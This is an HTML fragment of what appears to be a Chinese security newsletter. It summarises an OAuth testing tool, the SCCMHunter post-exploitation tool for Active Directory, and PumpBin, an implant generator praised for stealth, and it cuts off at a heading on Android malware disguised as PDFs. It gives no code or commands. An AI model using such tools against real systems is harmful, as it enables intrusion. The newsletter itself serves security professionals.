	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">OAuth 2.0 流程分析工具 FlowAnalyzer</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip460EG4djtxLN4Dn1MJibwGaGiaXVEibAfBhcqVk2ouRwFLHo7QkcCHvmr0A/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip460EG4djtxLN4Dn1MJibwGaGiaXVEibAfBhcqVk2ouRwFLHo7QkcCHvmr0A/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844211428482428"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FlowAnalyzer 是一个专门为了帮助理解和测试 OAuth 2.0 授权流程和 OpenID Connect（OIDC）而设计的工具。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具提供了执行授权流程的笔记本和详细的流程说明，以及如何设置证书认证的指南。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">强调代码仅供测试使用，不应在生产环境中部署。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">建议使用 Microsoft 身份验证平台的认证库或 JWT.io 上的库来处理生产环境中的认证和授权。</section></li></ul>
	<br/>
	<p>🏷️: OAuth, OpenID Connect, 安全测试, 工具</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 SCCMHunter：简化SCCM资产识别与攻击的工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SCCMHunter是一个针对微软系统管理中心配置管理器（SCCM）的后期渗透工具，旨在简化识别、描述和攻击AD域中的SCCM相关资产。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:bh us 马上要讲这个，SpecterOps发布</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46uicXlWvPWXz65ExcSb5kwic3MiatGqKJm1a9RkryTErS9DHr7RXsb3KNg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46uicXlWvPWXz65ExcSb5kwic3MiatGqKJm1a9RkryTErS9DHr7RXsb3KNg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855411548524221"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SCCMHunter是一个专门针对SCCM的后期渗透工具，它能够帮助渗透测试人员在Active Directory域中更有效地识别和攻击SCCM相关的资产。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开发者建议使用Python虚拟环境来安装SCCMHunter，以避免潜在的依赖冲突。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">工具的开发和测试在实验室环境中进行，实际使用效果可能因环境而异，开发者鼓励用户在遇到问题时寻求帮助。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SCCMHunter的开发受到了社区多位研究者的研究成果和实践经验的影响，这些研究者在SCCM的安全研究领域做出了显著贡献。</section></li></ul>
	<br/>
	<p>🏷️: SCCM, 网络安全, 攻击工具, Active Directory, 实验室环境</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0a
			 PumpBin：植入生成平台</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">PumpBin 是一个用于生成植入物（Implant）的平台，支持本地和远程插件类型，并采用 Extism 插件系统提供强大的扩展性，每个生成的植入物都具有唯一的随机加密密钥和随机化数据。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="512" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=bc5d4fc2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46rKoVh5fDG0lWROxGIbvockRoXuueyw1msqMlAvbblVCs2avq0NzIyw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6037037037037037" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=ffc8ee88&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46NnUYtqPiboSFypUN8NYoLicia52X6FAF9icQ1GIfsRbZWiaQKMwObIOPSag%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PumpBin：一款植入程序生成平台</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Rust 编写的植入物生成平台：支持 Extism 插件系统</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46kD3LBl9d60tq1havicNmibp5PxM9OgflwiaDZsBJfoXAYkAjZA9CWVHuw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46kD3LBl9d60tq1havicNmibp5PxM9OgflwiaDZsBJfoXAYkAjZA9CWVHuw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855411548544821"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PumpBin 旨在简化和标准化最终植入物的生成过程，提高网络安全研究人员和攻击人员的工作效率。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过使用 PumpBin，网络安全团队可以更灵活地生成定制的植入物，而无需频繁的直接沟通。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PumpBin 的设计遵循最小化原则，确保了平台的高灵活性和适应性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">PumpBin 的独特性在于它不依赖于网络连接（除了 Extism 插件），并且每个生成的植入物都是独一无二的，这有助于提高安全性和隐蔽性。</section></li></ul>
	<br/>
	<p>🏷️: 植入生成, 平台, 技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 WhatsApp漏洞：Android恶意软件伪装成PDF文件</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
